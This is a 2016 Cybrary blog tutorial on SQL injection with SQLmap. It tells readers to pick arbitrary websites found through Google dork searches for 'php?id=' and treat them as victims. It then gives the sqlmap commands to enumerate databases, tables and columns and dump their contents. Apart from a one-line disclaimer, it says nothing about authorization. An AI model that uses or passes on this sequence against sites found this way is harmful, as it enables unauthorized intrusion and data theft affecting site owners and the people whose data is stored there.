SQL Injection Using SQLmap – [PART 1]

June 13, 2016 | Views: 9138

Begin Learning Cyber Security for FREE Now!

FREE REGISTRATIONAlready a Member Login Here

SQL, Structured Query Language, is a programming language that allows the user to manage data in a relational database management system (RDBMS) through the use of specially crafted strings. Although great for functionality, it can be disastrous if configured/crafted incorrectly. We can exploit this using the pentesting tool SQLmap.

SQLmap is a penetration testing tool that automates the process of exploiting SQL injection flaws and SQL database takeover. More information on SQLmap can be found using Google, or the option -h.

 

Requirements:
-Basic understanding of SQL
-SQLmap
-Common Sense

This is for educational and research purposes only! Do not attempt to violate the law with anything contained here.

 

 

Step 1: Identifying the Target
To find a possibly vulnerable site, we’ll Google dork search the term: “php?id=”. A dork is an advance search using Google parameters such as “”, site:, and filetype:

A potentially vulnerable site looks something like this: http://mytarget.com/info.php?id=1

 

Step 2: Database Enumeration
Now that we found a target, let’s identify the databases.

sqlmap -u $url --batch --dbs

where $url is the target url.
sqlmap1
sqlmap2

 

We have the database names; let’s use this information to get the tables.

sqlmap -u $url --batch --table -D $databasename

Where $url is the Victim URL and $databasename is the name of the database.
sqlmap3
sqlmap4

 

With that information, we can discover the columns.

sqlmap -u $url --columns -D $databasename -T $tablename

Where $url is the Victim URL, $databasename is the name of the database, and $tablename is the name of the table.

sqlmap5
sqlmap6

 

Step 3: The Dump
Now that we’ve found our target, let’s dump what we have.

sqlmap -u $url --dump -D $databasename -T $tablename

And, we’ll get something like this:
sqlmap7sqlmap8

 

That’s it! I’ll be posting again, so stay tuned!

Bonus: Here’s a list of other popular Google dork queries.

Share with Friends
FacebookTwitterLinkedInEmail
Use Cybytes and
Tip the Author!
Join
Share with Friends
FacebookTwitterLinkedInEmail
Ready to share your knowledge and expertise?
22 Comments
  1. is linux best for hacking?

  2. This has been really helpful for me as a first time user of SQLmap, thanks for posting.

Page 4 of 4«1234
Comment on This

You must be logged in to post a comment.

Our Revolution

We believe Cyber Security training should be free, for everyone, FOREVER. Everyone, everywhere, deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is a free community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

Support Cybrary

Donate Here to Get This Month's Donor Badge

 

Cybrary|0P3N

Is Linux Worth Learning in 2020?
Views: 297 / December 14, 2019
How do I Get MTA Certified?
Views: 894 / December 12, 2019
How much does your PAM software really cost?
Views: 1345 / December 10, 2019
How Do I Get into Android Development?
Views: 1724 / December 8, 2019

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel